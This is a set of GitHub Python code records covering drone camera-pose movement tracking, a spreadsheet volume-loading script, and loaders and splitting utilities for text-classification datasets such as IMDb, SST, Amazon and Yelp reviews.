+{"seq_id":"40784815947","text":"\"\"\"\nDataclass extensions required for drone movement planning.\n\n\"\"\"\nfrom dataclasses import dataclass\nfrom pathlib import Path\n\nimport numpy as np\nimport numpy.typing as npt\nimport pandas as pd\nimport torch\nfrom scipy.spatial.transform import Rotation as R\nfrom typing_extensions import Self\n\nfrom sips.data import CameraPose\n\n__all__ = [\"Movement\", \"MovableCameraPose\", \"CameraPoseTracker\"]\n\n\n@dataclass\nclass Movement:\n \"\"\"\n Incorporates a relative movement (translation and rotation).\n \"\"\"\n\n surge: float\n sway: float\n heave: float\n roll: float\n pitch: float\n yaw: float\n degrees: bool = True\n\n def __post_init__(self) -> None:\n if self.degrees:\n return\n\n # Enforce degrees\n self.roll *= 180 / np.pi\n self.pitch *= 180 / np.pi\n self.yaw *= 180 / np.pi\n self.degrees = True\n\n def as_dict(self, units: bool = True, length_unit: str = \"m\") -> dict[str, float]:\n lu = au = \"\"\n if units:\n lu = f\"[{length_unit}]\" # length unit\n au = \"[deg]\" # angle unit\n\n translation = {\n f\"surge{lu}\": self.surge,\n f\"sway{lu}\": self.sway,\n f\"heave{lu}\": self.heave,\n }\n rotation = {\n f\"roll{au}\": self.roll,\n f\"pitch{au}\": self.pitch,\n f\"yaw{au}\": self.yaw,\n }\n return {**translation, **rotation}\n\n\nclass MovableCameraPose(CameraPose):\n \"\"\"\n Incorporates camera position and orientation and is movable with relative movements.\n \"\"\"\n\n @classmethod\n def neutral_pose(cls) -> \"MovableCameraPose\":\n return cls((0, 0, 0), (0, 0, 0, 1))\n\n def translate(self, dists: npt.ArrayLike) 
-> None:\n dists = np.asarray(dists)\n assert dists.shape == (3,), \"Invalid dimensions\"\n self.position += dists\n\n def surge(self, dist: float) -> Self:\n self.translate(R.from_quat(self.rotation).apply([dist, 0, 0]))\n return self\n\n def sway(self, dist: float) -> Self:\n self.translate(R.from_quat(self.rotation).apply([0, dist, 0]))\n return self\n\n def heave(self, dist: float) -> Self:\n self.translate(R.from_quat(self.rotation).apply([0, 0, dist]))\n return self\n\n def rotate(self, angles: npt.ArrayLike, degrees: bool = True) -> None:\n angles = np.asarray(angles)\n rot = R.from_rotvec(angles, degrees=degrees) # type: ignore\n\n self.rotation[:] = torch.from_numpy(\n (R.from_quat(self.rotation) * rot).as_quat()\n )\n\n def roll(self, angle: float, degrees: bool = True) -> Self:\n self.rotate([angle, 0, 0], degrees=degrees)\n return self\n\n def pitch(self, angle: float, degrees: bool = True) -> Self:\n self.rotate([0, angle, 0], degrees=degrees)\n return self\n\n def yaw(self, angle: float, degrees: bool = True) -> Self:\n self.rotate([0, 0, angle], degrees=degrees)\n return self\n\n def copy(self) -> \"MovableCameraPose\":\n return MovableCameraPose(self.position.clone(), self.rotation.clone())\n\n\nclass CameraPoseTracker:\n \"\"\"\n Keeps track of the movement history of camera poses.\n\n Parameters\n ----------\n init_pose : MovableCameraPose | None\n Initial pose. If None, a neutral pose will be used.\n \"\"\"\n\n def __init__(self, init_pose: MovableCameraPose | None = None) -> None:\n if init_pose is None:\n init_pose = MovableCameraPose.neutral_pose()\n\n self.abs_history: list[MovableCameraPose] = [init_pose]\n self.rel_history: list[Movement] = [Movement(0, 0, 0, 0, 0, 0)]\n\n def __len__(self) -> int:\n assert len(self.abs_history) == len(self.rel_history)\n return len(self.abs_history)\n\n def __getitem__(self, ix: int) -> tuple[MovableCameraPose, Movement]:\n return self.abs_history[ix], self.rel_history[ix]\n\n def __iter__(self) -> Self:\n self._current_index = 0\n return self\n\n def __next__(self) -> tuple[MovableCameraPose, Movement]:\n ix = self._current_index\n if ix > len(self) - 1:\n raise StopIteration\n self._current_index += 1\n return self[ix]\n\n # ----------------------------------------------------------------------\n # Transformations\n\n def move(\n self,\n surge: float = 0,\n sway: float = 0,\n heave: float = 0,\n roll: float = 0,\n pitch: float = 0,\n yaw: float = 0,\n degrees: bool = True,\n ) -> Self:\n \"\"\"\n Movements relative to the camera's orientation.\n\n \"\"\"\n curr_pose = self.abs_history[-1]\n next_pose = curr_pose.copy()\n # Apply transformation\n next_pose.surge(surge).sway(sway).heave(heave)\n next_pose.roll(roll, degrees).pitch(pitch, degrees).yaw(yaw, degrees)\n # Append to history\n self.abs_history.append(next_pose)\n self.rel_history.append(Movement(surge, sway, heave, roll, pitch, yaw, degrees))\n return self\n\n # ----------------------------------------------------------------------\n # Utils\n\n def get_pos_limits(self) -> tuple[tuple[float, float], ...]:\n xyz_arr = [pose.position.numpy() for pose in self.abs_history]\n xyz_mins = np.array(xyz_arr).min(0)\n xyz_maxs = np.array(xyz_arr).max(0)\n\n return tuple(zip(xyz_mins, xyz_maxs))\n\n # ----------------------------------------------------------------------\n # Export\n\n def to_pandas(self, add_units: bool = True) -> pd.DataFrame:\n df = pd.DataFrame([p.as_dict(units=add_units) for p in self.rel_history])\n return df\n\n def to_csv(\n self,\n filepath: str | Path,\n 
sep: str = \",\",\n add_units: bool = True,\n ) -> None:\n self.to_pandas(add_units=add_units).to_csv(filepath, index=False, sep=sep)\n","repo_name":"tstreule/SIPS","sub_path":"drone_movements/_data.py","file_name":"_data.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"8316459456","text":"import pandas as pd\nimport utils.general as ut\nimport variables.type as tp\nimport variables.var_column as clmn\nimport variables.DIAGEO_setup.dashboard as dash\nimport variables.DIAGEO_setup.my_dict as stp_dct\nfrom Dataset import Raw, Matrix\nimport variables.dict as dct\nimport copy\n\n\ndef load_volume(actual_initial_date, any_stp_dict, previous_archive_volume_to_be_loaded=False,\n archive_initial_date=pd.Timestamp(year=1900, month=1, day=1),\n actual_end_date=pd.Timestamp(year=2099, month=12, day=31)):\n [mtx_nomenclature, mtx_uom_conversion, mtx_part_number] = Matrix.DataMatrix.load_old_object_list(\n ['nomenclature', 'uom_conversion',\n 'part_number'], any_stp_dict)\n mtx_volume = Matrix.DataMatrix.load_from_json('volume', root=any_stp_dict[dct.root_folder],\n folder=any_stp_dict[dct.json_folder])\n mtx_volume_actual = copy.deepcopy(mtx_volume)\n mtx_volume_actual.load_dataframe(any_raw_dataset_name_list=['volume_actual'],\n any_mtx_nomenclature=mtx_nomenclature, any_mtx_uom_conversion=mtx_uom_conversion,\n any_mtx_part_number=mtx_part_number, root_json=any_stp_dict[dct.root_folder],\n folder_json=any_stp_dict[dct.json_folder], key_clmn=clmn.part_number_code)\n mtx_volume_actual.trim_date(initial_date=actual_initial_date,\n end_date=actual_end_date,\n date_clmn=clmn.date, reset_index=True)\n mtx_volume.concat_datamatrix(mtx_volume_actual)\n\n if previous_archive_volume_to_be_loaded:\n print('volume 31')\n else:\n mtx_volume_archive = copy.deepcopy(mtx_volume)\n mtx_volume_archive.load_dataframe_from_family(base_dataset_family_name='volume_legacy',\n any_stp_dict=any_stp_dict, any_mtx_nomenclature=mtx_nomenclature,\n any_mtx_uom_conversion=mtx_uom_conversion,\n any_mtx_part_number=mtx_part_number,\n treat_date=False, load_all_files_within_folder=True,\n load_all_sheets_on_spreadsheet=False,\n key_clmn=clmn.part_number_code)\n mtx_volume_archive.trim_date(initial_date=actual_initial_date,\n end_date=actual_end_date,\n date_clmn=clmn.date, reset_index=True)\n mtx_volume.concat_datamatrix(mtx_volume_archive)\n\n\n # if archive_volume_to_be_loaded:\n # mtx_volume_archive = Matrix.DataMatrix.load_old_object('volume', any_stp_dict= any_stp_dict, is_for_archive=True)\n # mtx_volume_archive.filter_based_on_column(any_column=clmn.is_forecast, value_list=[False],\n # keep_value_in=True)\n # mtx_volume_archive.trim_date(initial_date=archive_initial_date,\n # end_date=refresh_initial_date - pd.DateOffset(days=1),\n # date_clmn=clmn.date, reset_index=True)\n # mtx_volume.concat_base_dataset(mtx_volume_archive)\n\n if mtx_volume.get_row_number() > 0:\n mtx_volume.assure_column_integrity()\n mtx_volume.write(any_stp_dict, save_dataframe=True, save_error=True)\n\n return\n\n\nif __name__ == \"__main__\":\n pd.set_option('display.max_columns', 30)\n pd.set_option('display.max_rows', 70000)\n load_volume(any_stp_dict=stp_dct.setup_dict,\n previous_archive_volume_to_be_loaded=dash.previous_archive_volume_to_be_loaded,\n archive_initial_date=dash.archive_initial_date,\n actual_initial_date=dash.actual_initial_date,\n actual_end_date=dash.actual_end_date)\n\n# Trim dates for lagged dataframe, new historical, 
forecast\n# Date sampling\n# Add forecast\n\n\n\n\n\n","repo_name":"mmvn23/spreadsheetGrinder","sub_path":"processing/DIAGEO/volume.py","file_name":"volume.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14130558208","text":"from torch.utils.data import Dataset\nimport torch \nimport random\nimport os \nimport numpy as np\nimport json\nimport pandas as pd\n\ndef load_imdb_dataset(data_path, seed=123):\n \"\"\"Loads the IMDb movie reviews sentiment analysis dataset.\n\n # Arguments\n data_path: string, path to the data directory.\n seed: int, seed for randomizer.\n\n # Returns\n A tuple of training, unlabeled, and test data.\n\n # References\n Mass et al., http://www.aclweb.org/anthology/P11-1015\n\n Download and uncompress archive from:\n http://ai.stanford.edu/~amaas/data/sentiment/aclImdb_v1.tar.gz\n \"\"\"\n imdb_data_path = os.path.join(data_path, 'aclImdb')\n\n # Load the training data\n train_texts = []\n train_labels = []\n for category in ['pos', 'neg']:\n train_path = os.path.join(imdb_data_path, 'train', category)\n for fname in sorted(os.listdir(train_path)):\n if fname.endswith('.txt'):\n with open(os.path.join(train_path, fname), encoding='utf-8') as f:\n train_texts.append(f.read())\n train_labels.append(0 if category == 'neg' else 1)\n \n # Load the unsupervised data\n unlabeled_texts = []\n unlabeled_labels = [] # all -1\n unsup_path = os.path.join(imdb_data_path, 'train', 'unsup')\n for fname in sorted(os.listdir(unsup_path)):\n if fname.endswith('.txt'):\n with open(os.path.join(unsup_path, fname)) as f:\n unlabeled_texts.append(f.read())\n unlabeled_labels.append(-1)\n\n # Load the test data.\n test_texts = []\n test_labels = []\n for category in ['pos', 'neg']:\n test_path = os.path.join(imdb_data_path, 'test', category)\n for fname in sorted(os.listdir(test_path)):\n if fname.endswith('.txt'):\n with open(os.path.join(test_path, fname)) as f:\n test_texts.append(f.read())\n test_labels.append(0 if category == 'neg' else 1)\n\n # Shuffle the training data and labels.\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (unlabeled_texts, np.array(unlabeled_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_sst2_dataset(data_path, seed=123):\n sst2_data_path = os.path.join(data_path, 'SST-2')\n\n # Load training data -> unlabeled will come from here\n train_texts = []\n train_labels = []\n train_text_path = os.path.join(sst2_data_path, 'sst2_train_sentences.txt')\n with open(train_text_path, encoding='utf-8') as f:\n texts = f.read()\n result = [text for text in texts.split('\\n')]\n result = result[:-1]\n train_texts = [element.strip() for element in result]\n \n train_label_path = os.path.join(sst2_data_path, 'sst2_train_labels.txt')\n with open(train_label_path, encoding='utf-8') as f:\n labels = f.read()\n result = [label for label in labels.split('\\n')]\n result = result[:-1]\n train_labels = [int(element) for element in result]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_text_path = os.path.join(sst2_data_path, 'sst2_test_sentences.txt')\n with open(test_text_path, encoding='utf-8') as f:\n texts = f.read()\n result = [text for text in texts.split('\\n')]\n result = result[:-1]\n test_texts = [element.strip() for element in result]\n \n test_label_path = os.path.join(sst2_data_path, 'sst2_test_labels.txt')\n with 
open(test_label_path, encoding='utf-8') as f:\n labels = f.read()\n result = [label for label in labels.split('\\n')]\n result = result[:-1]\n test_labels = [int(element) for element in result]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_sst5_dataset(data_path, seed=123):\n sst5_data_path = os.path.join(data_path, 'SST-5')\n\n # Load training data -> unlabeled will come from here\n train_texts = []\n train_labels = []\n train_path = os.path.join(sst5_data_path, 'sst_train.txt')\n with open(train_path, encoding='utf-8') as f:\n texts = f.read()\n result = [text.split('\\t') for text in texts.split('\\n')]\n result = result[0:-1]\n train_texts = [element[1].strip() for element in result]\n train_labels = [int(element[0][-1])-1 for element in result]\n\n # Load validation/dev data -> unlabeled will come from here\n validation_texts = []\n validation_labels = []\n validation_path = os.path.join(sst5_data_path, 'sst_dev.txt')\n with open(validation_path, encoding='utf-8') as f:\n texts = f.read()\n result = [text.split('\\t') for text in texts.split('\\n')]\n result = result[0:-1]\n validation_texts = [element[1].strip() for element in result]\n validation_labels = [int(element[0][-1])-1 for element in result]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_path = os.path.join(sst5_data_path, 'sst_test.txt')\n with open(test_path, encoding='utf-8') as f:\n texts = f.read()\n result = [text.split('\\t') for text in texts.split('\\n')]\n result = result[0:-1]\n test_texts = [element[1].strip() for element in result]\n test_labels = [int(element[0][-1])-1 for element in result]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n # Combine train and validation\n train_texts.extend(validation_texts)\n train_labels.extend(validation_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_amazon_elec_dataset(data_path, seed=123):\n amazon_elec_data_path = os.path.join(data_path, 'Electronics_5.json')\n\n texts = []\n labels = []\n with open(amazon_elec_data_path, encoding='utf-8') as f:\n data = f.read()\n result = data.split('\\n')\n for i in range(len(result)-1):\n entry = json.loads(result[i])\n if 'reviewText' in entry:\n texts.append(entry['reviewText'])\n labels.append(int(entry['overall'])-1)\n \n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(texts)\n random.seed(seed)\n random.shuffle(labels)\n\n return ((texts, np.array(labels)),)\n\ndef load_amazon_elec_binary_dataset(data_path, seed=123):\n amazon_elec_data_path = os.path.join(data_path, 'Electronics_5.json')\n\n texts = []\n labels = []\n with open(amazon_elec_data_path, encoding='utf-8') as f:\n data = f.read()\n result = data.split('\\n')\n for i in range(len(result)-1):\n entry = json.loads(result[i])\n if 'reviewText' in entry:\n # original labels from 1 to 5 -> 1 and 2 become negative label, 4 and 5 become positive label, 3 thrown out\n if int(entry['overall']) in (1, 2):\n texts.append(entry['reviewText'])\n labels.append(0)\n elif int(entry['overall']) in (4, 5):\n texts.append(entry['reviewText'])\n labels.append(1) \n \n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(texts)\n random.seed(seed)\n random.shuffle(labels)\n\n 
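# note: wrapped in a one-element tuple so callers can unpack it like the loaders that also return test splits\n    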
return ((texts, np.array(labels)),)\n\ndef load_modified_amazon_elec_binary_dataset(data_path, seed=123):\n amazon_elec_data_path = os.path.join(data_path, 'elec-unlab')\n\n # Load training data\n train_texts = [] \n train_labels = []\n train_texts_file = 'elec-25k-train.txt'\n train_labels_file = 'elec-25k-train.cat' # labels are 1 and 2\n with open(os.path.join(amazon_elec_data_path, train_texts_file), encoding='utf-8') as f:\n train_texts = [element.strip() for element in f.read().split('\\n')]\n train_texts = train_texts[:-1]\n with open(os.path.join(amazon_elec_data_path, train_labels_file), encoding='utf-8') as f:\n labels = [element for element in f.read().split('\\n')]\n labels = labels[:-1]\n train_labels = [int(element) - 1 for element in labels]\n\n # Load unlabeled data\n unlabeled_texts = [] \n unlabeled_labels = []\n unlabeled_texts_files = ['elec-25k-unlab00.txt', 'elec-25k-unlab01.txt']\n for file in unlabeled_texts_files:\n with open(os.path.join(amazon_elec_data_path, file), encoding='utf-8') as f:\n texts = [element.strip() for element in f.read().split('\\n')]\n texts = texts[:-1]\n unlabeled_texts.extend(texts)\n unlabeled_labels = [-1 for _ in range(len(unlabeled_texts))]\n\n # Load test data\n test_texts = [] \n test_labels = []\n test_texts_file = 'elec-test.txt'\n test_labels_file = 'elec-test.cat' # labels are 1 and 2\n with open(os.path.join(amazon_elec_data_path, test_texts_file), encoding='utf-8') as f:\n test_texts = [element.strip() for element in f.read().split('\\n')]\n test_texts = test_texts[:-1]\n with open(os.path.join(amazon_elec_data_path, test_labels_file), encoding='utf-8') as f:\n labels = [element for element in f.read().split('\\n')]\n labels = labels[:-1]\n test_labels = [int(element) - 1 for element in labels]\n\n # Shuffle the training data and labels.\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (unlabeled_texts, np.array(unlabeled_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_dbpedia_dataset(data_path, seed=123):\n dbpedia_data_path = os.path.join(data_path, 'dbpedia_csv')\n\n # Load train data\n train_texts = []\n train_labels = []\n train_path = os.path.join(dbpedia_data_path, 'train.csv')\n train_data = pd.read_csv(train_path, header=None)\n train_data.columns = ['class', 'title', 'content']\n train_texts = train_data['content'].tolist()\n train_labels = train_data['class'].tolist()\n train_labels = [element - 1 for element in train_labels]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_path = os.path.join(dbpedia_data_path, 'test.csv')\n test_data = pd.read_csv(test_path, header=None)\n test_data.columns = ['class', 'title', 'content']\n test_texts = test_data['content'].tolist()\n test_labels = test_data['class'].tolist()\n test_labels = [element - 1 for element in test_labels]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_ag_news_dataset(data_path, seed=123):\n ag_news_data_path = os.path.join(data_path, 'ag_news_csv')\n\n # Load train data\n train_texts = []\n train_labels = []\n train_path = os.path.join(ag_news_data_path, 'train.csv')\n train_data = pd.read_csv(train_path, header=None)\n train_data.columns = ['class', 'title', 'content']\n train_texts = train_data['content'].tolist()\n train_labels = 
train_data['class'].tolist()\n train_labels = [element - 1 for element in train_labels]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_path = os.path.join(ag_news_data_path, 'test.csv')\n test_data = pd.read_csv(test_path, header=None)\n test_data.columns = ['class', 'title', 'content']\n test_texts = test_data['content'].tolist()\n test_labels = test_data['class'].tolist()\n test_labels = [element - 1 for element in test_labels]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_yelp_full_dataset(data_path, seed=123):\n yelp_data_path = os.path.join(data_path, 'yelp_review_full_csv')\n\n # Load train data\n train_texts = []\n train_labels = []\n train_path = os.path.join(yelp_data_path, 'train.csv')\n train_data = pd.read_csv(train_path, header=None)\n train_data.columns = ['class', 'text']\n train_texts = train_data['text'].tolist()\n train_labels = train_data['class'].tolist()\n train_labels = [element - 1 for element in train_labels]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_path = os.path.join(yelp_data_path, 'test.csv')\n test_data = pd.read_csv(test_path, header=None)\n test_data.columns = ['class', 'text']\n test_texts = test_data['text'].tolist()\n test_labels = test_data['class'].tolist()\n test_labels = [element - 1 for element in test_labels]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_yelp_polarity_dataset(data_path, seed=123):\n yelp_data_path = os.path.join(data_path, 'yelp_review_polarity_csv')\n\n # Load train data\n train_texts = []\n train_labels = []\n train_path = os.path.join(yelp_data_path, 'train.csv')\n train_data = pd.read_csv(train_path, header=None)\n train_data.columns = ['class', 'text']\n train_texts = train_data['text'].tolist()\n train_labels = train_data['class'].tolist()\n train_labels = [element - 1 for element in train_labels]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_path = os.path.join(yelp_data_path, 'test.csv')\n test_data = pd.read_csv(test_path, header=None)\n test_data.columns = ['class', 'text']\n test_texts = test_data['text'].tolist()\n test_labels = test_data['class'].tolist()\n test_labels = [element - 1 for element in test_labels]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_amazon_full_dataset(data_path, seed=123):\n amazon_data_path = os.path.join(data_path, 'amazon_review_full_csv')\n\n # Load train data\n train_texts = []\n train_labels = []\n train_path = os.path.join(amazon_data_path, 'train.csv')\n train_data = pd.read_csv(train_path, header=None)\n train_data.columns = ['class', 'title', 'text']\n train_texts = train_data['text'].tolist()\n train_labels = train_data['class'].tolist()\n train_labels = [element - 1 for element in train_labels]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_path = os.path.join(amazon_data_path, 'test.csv')\n test_data = pd.read_csv(test_path, header=None)\n test_data.columns = ['class', 'title', 'text']\n test_texts = test_data['text'].tolist()\n 
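# class ids in the CSV are 1-based; the comprehension below shifts them to 0-based\n    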
test_labels = test_data['class'].tolist()\n test_labels = [element - 1 for element in test_labels]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_amazon_polarity_dataset(data_path, seed=123):\n amazon_data_path = os.path.join(data_path, 'amazon_review_polarity_csv')\n\n # Load train data\n train_texts = []\n train_labels = []\n train_path = os.path.join(amazon_data_path, 'train.csv')\n train_data = pd.read_csv(train_path, header=None)\n train_data.columns = ['class', 'title', 'text']\n train_texts = train_data['text'].tolist()\n train_labels = train_data['class'].tolist()\n train_labels = [element - 1 for element in train_labels]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_path = os.path.join(amazon_data_path, 'test.csv')\n test_data = pd.read_csv(test_path, header=None)\n test_data.columns = ['class', 'title', 'text']\n test_texts = test_data['text'].tolist()\n test_labels = test_data['class'].tolist()\n test_labels = [element - 1 for element in test_labels]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_yahoo_answers_dataset(data_path, seed=123):\n yahoo_answers_data_path = os.path.join(data_path, 'yahoo_answers_csv')\n\n # Load train data\n train_texts = []\n train_labels = []\n train_path = os.path.join(yahoo_answers_data_path, 'train.csv')\n train_data = pd.read_csv(train_path, header=None)\n train_data.columns = ['class', 'title', 'content', 'answer']\n train_data = train_data[['class', 'answer']]\n train_data = train_data.dropna()\n train_texts = train_data['answer'].tolist()\n train_labels = train_data['class'].tolist()\n train_labels = [element - 1 for element in train_labels]\n\n # Load test data\n test_texts = []\n test_labels = []\n test_path = os.path.join(yahoo_answers_data_path, 'test.csv')\n test_data = pd.read_csv(test_path, header=None)\n test_data.columns = ['class', 'title', 'content', 'answer']\n test_data = test_data[['class', 'answer']]\n test_data = test_data.dropna()\n test_texts = test_data['answer'].tolist()\n test_labels = test_data['class'].tolist()\n test_labels = [element - 1 for element in test_labels]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(train_texts)\n random.seed(seed)\n random.shuffle(train_labels)\n\n return ((train_texts, np.array(train_labels)),\n (test_texts, np.array(test_labels)))\n\ndef load_twenty_news_dataset(data_path, seed=123):\n twenty_news_data_path = os.path.join(data_path, '20news-18828')\n\n texts = []\n labels = []\n label_index = 0\n\n for folder_name in sorted(os.listdir(twenty_news_data_path)):\n label_index += 1\n path = os.path.join(twenty_news_data_path, folder_name)\n for filename in sorted(os.listdir(path)):\n with open(os.path.join(path, filename), 'rb') as f:\n text = f.read().decode('utf-8', 'ignore')\n texts.append(text)\n labels.append(label_index)\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(texts)\n random.seed(seed)\n random.shuffle(labels)\n\n return ((texts, np.array(labels)),)\n\ndef load_airport_tweets_dataset(data_path, seed=123):\n airport_tweets_data_path = os.path.join(data_path, 'Tweets.csv')\n\n texts = []\n labels = []\n data = 
pd.read_csv(airport_tweets_data_path)\n texts = data['text'][data['airline_sentiment'] != 'neutral'].tolist()\n labels = data['airline_sentiment'][data['airline_sentiment'] != 'neutral'].tolist()\n labels = [1 if element == 'positive' else 0 for element in labels]\n\n # Shuffle training data and labels\n random.seed(seed)\n random.shuffle(texts)\n random.seed(seed)\n random.shuffle(labels)\n\n return ((texts, np.array(labels)),)\n\nclass TextDataset(Dataset):\n def __init__(self, txt, labels):\n self.labels = labels\n self.text = txt\n def __len__(self):\n return len(self.labels)\n def __getitem__(self, idx):\n label = self.labels[idx]\n text = self.text[idx]\n sample = {\"Text\": text, \"Class\": label}\n return sample\n def get_labels(self):\n return self.labels\n def get_text(self):\n return self.text\n\ndef create_dataset(text, labels, slice_start=None, slice_end=None):\n '''\n Create instance of TextDataset given a dataset\n '''\n if slice_start is None:\n slice_start = 0\n if slice_end is None:\n slice_end = len(text)\n return TextDataset(text[slice_start:slice_end], labels[slice_start:slice_end])\n\ndef split_datasets(train, \n labeled_proportion, \n validation_proportion=None, \n test=None, \n unlabeled=None, \n balance_classes=False, \n no_calibration=False):\n '''\n Takes as input three tuples - (train_text, train_labels), (test_text, test_labels), (unlabeled_text, unlabeled_labels)\n Outputs (train_text, train_labels), (validation_text, validation_labels), (test_text, test_labels), (unlabeled_text, unlabeled_labels)\n Test is unchanged\n Validation comes from input train (size = validation_proportion * size of input train)\n Train is a subset of input train (size = labeled_proportion * size of input train)\n Remaining unused samples from input train added to unlabeled set\n labeled_proportion + validation_proportion must be <= 1\n '''\n if no_calibration is False:\n if labeled_proportion + validation_proportion > 1:\n raise Exception('labeled_proportion and validation_proportion cannot sum to more than 1')\n else:\n if labeled_proportion > 1:\n raise Exception('labeled_proportion cannot be greater than 1')\n\n original_train_length = len(train[1])\n\n if balance_classes: # create train set with equal number of samples for each class\n unique_classes = np.sort(np.unique(np.array(train[1])))\n\n train_labels = np.array(train[1])\n train_texts = np.array(train[0])\n idx = np.argsort(train_labels)\n\n train_labels = list(np.array(train_labels)[idx])\n train_texts = list(np.array(train_texts)[idx])\n\n new_train_size = int(labeled_proportion * len(train[1]))\n num_per_class = int(1.0 * new_train_size / len(unique_classes)) # rounds down\n\n idx_for_each_class = []\n for class_label in unique_classes:\n class_idx = train_labels.index(class_label)\n idx_for_each_class.append(class_idx)\n idx_for_each_class.append(len(train_labels))\n \n new_train_texts = []\n new_train_labels = []\n old_train_texts = []\n old_train_labels = []\n\n for i in range(len(idx_for_each_class)-1):\n index = idx_for_each_class[i]\n next_index = idx_for_each_class[i+1]\n\n new_train_texts.extend(train_texts[index:index+num_per_class])\n new_train_labels.extend(train_labels[index:index+num_per_class])\n old_train_texts.extend(train_texts[index+num_per_class:next_index])\n old_train_labels.extend(train_labels[index+num_per_class:next_index])\n\n\n # shuffle\n random.seed(123)\n zipped_new_train = list(zip(new_train_texts, new_train_labels))\n random.shuffle(zipped_new_train)\n new_train_texts, new_train_labels = 
zip(*zipped_new_train)\n\n zipped_old_train = list(zip(old_train_texts, old_train_labels))\n random.shuffle(zipped_old_train)\n old_train_texts, old_train_labels = zip(*zipped_old_train)\n\n new_train = list(new_train_texts), list(new_train_labels) \n old_train = list(old_train_texts), list(old_train_labels)\n else:\n new_train_size = int(labeled_proportion * len(train[1]))\n new_train = train[0][:new_train_size], train[1][:new_train_size]\n old_train = train[0][new_train_size:], train[1][new_train_size:]\n\n if test is None:\n # make test set 20% of original train\n new_test_size = int(0.2 * original_train_length)\n test = old_train[0][:new_test_size], old_train[1][:new_test_size]\n old_train = old_train[0][new_test_size:], old_train[1][new_test_size:]\n\n if no_calibration is False:\n validation_size = int(validation_proportion * original_train_length)\n validation = old_train[0][:validation_size], old_train[1][:validation_size]\n old_train = old_train[0][validation_size:], old_train[1][validation_size:]\n else:\n validation = None\n\n if unlabeled is None:\n new_unlabeled_text = np.array(old_train[0])\n else:\n new_unlabeled_text = np.concatenate((unlabeled[0], old_train[0]), axis=0)\n new_unlabeled_labels = np.full((new_unlabeled_text.shape[0], 1), -1)\n new_unlabeled = (new_unlabeled_text, new_unlabeled_labels)\n return new_train, validation, test, new_unlabeled\n\ndef dataset_metrics(dataset):\n '''\n Assumes dataset is tuple with (text, labels)\n '''\n text, labels = dataset\n num_samples = len(labels)\n\n num_classes = len(np.unique(labels))\n\n # label distribution (# samples / class)\n (unique_label, counts_label) = np.unique(labels, return_counts=True)\n label_distribution = np.asarray((unique_label, counts_label)).T # class number to # samples in that class\n\n # number of words per sample\n num_words_per_sample = [len(element.split(' ')) for element in text]\n average_words_per_sample = np.average(num_words_per_sample)\n\n (unique_word, counts_word) = np.unique(num_words_per_sample, return_counts=True)\n word_distribution = np.asarray((unique_word, counts_word)).T # num words to num samples with that many words\n\n return num_samples, num_classes, label_distribution, average_words_per_sample, word_distribution\n\ndef get_dataset_from_dataloader(dataloader, device):\n texts = []\n labels = []\n\n with torch.no_grad():\n for (_, batch) in enumerate(dataloader):\n inputs, outputs = batch['Text'].to(device), batch['Class'].to(device)\n\n texts.append(inputs)\n labels.extend(outputs.cpu().numpy())\n \n texts = torch.cat(texts).cpu().numpy()\n \n return texts, labels\n","repo_name":"emmaliu8/selftraining_calibration","sub_path":"data_setup.py","file_name":"data_setup.py","file_ext":"py","file_size_in_byte":25661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21734394588","text":"import numpy as np\nfrom . 
